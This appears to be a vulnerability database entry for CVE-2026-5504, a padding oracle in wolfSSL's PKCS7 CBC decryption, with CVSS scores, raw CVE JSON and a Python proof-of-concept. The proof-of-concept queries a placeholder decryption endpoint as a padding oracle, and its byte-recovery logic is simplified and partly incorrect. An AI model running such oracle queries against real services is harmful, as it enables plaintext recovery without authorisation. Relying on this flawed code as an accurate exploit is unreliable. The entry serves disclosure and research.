Security Vulnerability Report
中文
CVE-2026-5504 CVSS 5.3 MEDIUM

CVE-2026-5504

Published: 2026-04-09 23:17:01
Last Modified: 2026-04-29 14:06:59
Source: [email protected]

Description

A padding oracle exists in wolfSSL's PKCS7 CBC decryption that could allow an attacker to recover plaintext through repeated decryption queries with modified ciphertext. In previous versions of wolfSSL the interior padding bytes are not validated.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:* - VULNERABLE
wolfSSL (修复前的先前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for Padding Oracle Attack against wolfSSL (CVE-2026-5504) import requests import binascii # Target endpoint vulnerable to the padding oracle target_url = "https://example.com/api/decrypt" # Intercepted ciphertext (IV + Ciphertext) iv = b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f' ciphertext_block = b'\xaa\xbb\xcc\xdd\xee\xff\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99' def padding_oracle(ciphertext): """ Sends the ciphertext to the server. Returns True if padding is valid, False otherwise. """ try: response = requests.post(target_url, json={"data": binascii.hexlify(ciphertext).decode()}) # Differentiate based on response content or status code # Example: 200 OK might mean valid padding, 400/500 or specific error msg means invalid if response.status_code == 200: return True elif "padding" in response.text.lower(): return False else: # Sometimes generic error still implies padding failure in this context return False except Exception as e: print(f"Error connecting to oracle: {e}") return False # Simulation of the attack logic to decrypt one byte print("[+] Starting Padding Oracle Attack Simulation...") # In a real attack, we would iterate 0x00 to 0xff to find the byte that produces valid padding # by manipulating the previous block (IV). for guess in range(256): # Modify the last byte of the IV to guess the plaintext byte modified_iv = bytearray(iv) modified_iv[-1] = (modified_iv[-1] ^ guess) # Simplified XOR logic for demonstration test_payload = bytes(modified_iv) + ciphertext_block if padding_oracle(test_payload): print(f"[+] Valid padding found with guess byte: {hex(guess)}") # Further logic would calculate the actual plaintext byte break else: print("[-] Could not determine byte using simple simulation.") print("[+] PoC execution completed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5504", "sourceIdentifier": "[email protected]", "published": "2026-04-09T23:17:01.400", "lastModified": "2026-04-29T14:06:58.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A padding oracle exists in wolfSSL's PKCS7 CBC decryption that could allow an attacker to recover plaintext through repeated decryption queries with modified ciphertext. In previous versions of wolfSSL the interior padding bytes are not validated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-354"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.9.0", "matchCriteriaId": "DA5C710C-46E8-470C-83AF-D33D1A40512D"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl/pull/10088", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.